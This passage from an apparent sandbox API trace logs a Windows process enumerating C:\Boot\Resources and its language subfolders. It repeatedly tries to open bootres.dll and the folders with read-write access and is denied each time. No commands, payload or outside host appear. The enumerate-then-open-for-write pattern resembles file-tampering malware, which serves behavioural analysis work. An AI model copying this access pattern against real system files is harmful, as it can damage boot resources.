Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0084.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.010] AreFileApisANSI () returned 1 [0084.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0084.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x24) returned 0x7a8d8 [0084.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7a8d8, cchWideChar=18 | out: lpWideCharStr="C:\\Boot\\Resources") returned 18 [0084.010] CreateFileW (lpFileName="C:\\Boot\\Resources" (normalized: "c:\\boot\\resources"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.010] GetLastError () returned 0x5 [0084.010] GetLastError () returned 0x5 [0084.010] SetLastError (dwErrCode=0x5) [0084.010] GetLastError () returned 0x5 [0084.011] SetLastError (dwErrCode=0x5) [0084.011] GetLastError () returned 0x5 [0084.011] SetLastError (dwErrCode=0x5) [0084.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a8d8 | out: hHeap=0x20000) returned 1 [0084.011] AreFileApisANSI () returned 1 [0084.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0084.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x24) returned 0x7a7b8 [0084.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7a7b8, cchWideChar=18 | out: lpWideCharStr="C:\\Boot\\Resources") returned 18 [0084.011] CreateFileW (lpFileName="C:\\Boot\\Resources" (normalized: "c:\\boot\\resources"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.011] GetLastError () returned 0x5 [0084.011] GetLastError () returned 0x5 [0084.011] SetLastError (dwErrCode=0x5) [0084.011] GetLastError () returned 0x5 [0084.011] SetLastError (dwErrCode=0x5) [0084.011] GetLastError () returned 0x5 [0084.011] SetLastError (dwErrCode=0x5) [0084.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a7b8 | out: hHeap=0x20000) returned 1 [0084.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0084.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0084.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0084.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0084.012] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0084.012] FindFirstFileExW (in: lpFileName="C:\\Boot\\Resources\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78550 [0084.012] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.012] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9abff9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef597530, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x169a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll", cAlternateFileName="")) returned 1 [0084.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0084.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0084.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0084.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0084.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0084.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0084.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.013] AreFileApisANSI () returned 1 [0084.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Resources\\bootres.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Resources\\bootres.dll", lpUsedDefaultChar=0x0) returned 30 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.013] AreFileApisANSI () returned 1 [0084.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0084.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Resources\\bootres.dll") returned 30 [0084.014] CreateFileW (lpFileName="C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0084.014] GetFileType (hFile=0x340) returned 0x1 [0084.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0084.014] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.014] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.014] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.014] CloseHandle (hObject=0x340) returned 1 [0084.014] AreFileApisANSI () returned 1 [0084.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0084.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Resources\\bootres.dll") returned 30 [0084.015] CreateFileW (lpFileName="C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.015] GetLastError () returned 0x5 [0084.015] GetLastError () returned 0x5 [0084.015] SetLastError (dwErrCode=0x5) [0084.015] GetLastError () returned 0x5 [0084.015] SetLastError (dwErrCode=0x5) [0084.015] GetLastError () returned 0x5 [0084.015] SetLastError (dwErrCode=0x5) [0084.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0084.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.015] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="en-US", cAlternateFileName="")) returned 1 [0084.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0084.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0084.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0084.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0084.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0084.016] AreFileApisANSI () returned 1 [0084.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Resources\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Resources\\en-US", lpUsedDefaultChar=0x0) returned 24 [0084.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.016] AreFileApisANSI () returned 1 [0084.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0084.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x4e0a0, cchWideChar=24 | out: lpWideCharStr="C:\\Boot\\Resources\\en-US") returned 24 [0084.016] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US" (normalized: "c:\\boot\\resources\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.016] GetLastError () returned 0x5 [0084.016] GetLastError () returned 0x5 [0084.016] SetLastError (dwErrCode=0x5) [0084.016] GetLastError () returned 0x5 [0084.016] SetLastError (dwErrCode=0x5) [0084.016] GetLastError () returned 0x5 [0084.016] SetLastError (dwErrCode=0x5) [0084.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0084.017] AreFileApisANSI () returned 1 [0084.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0084.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x4dff8, cchWideChar=24 | out: lpWideCharStr="C:\\Boot\\Resources\\en-US") returned 24 [0084.017] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US" (normalized: "c:\\boot\\resources\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.017] GetLastError () returned 0x5 [0084.017] GetLastError () returned 0x5 [0084.017] SetLastError (dwErrCode=0x5) [0084.017] GetLastError () returned 0x5 [0084.017] SetLastError (dwErrCode=0x5) [0084.017] GetLastError () returned 0x5 [0084.017] SetLastError (dwErrCode=0x5) [0084.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0084.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0084.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.017] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x2e, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x78618, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x2e, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="")) returned 0 [0084.017] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0084.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0084.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.018] FindFirstFileExW (in: lpFileName="C:\\Boot\\Resources\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x780d0 [0084.018] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.018] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0084.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0084.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: 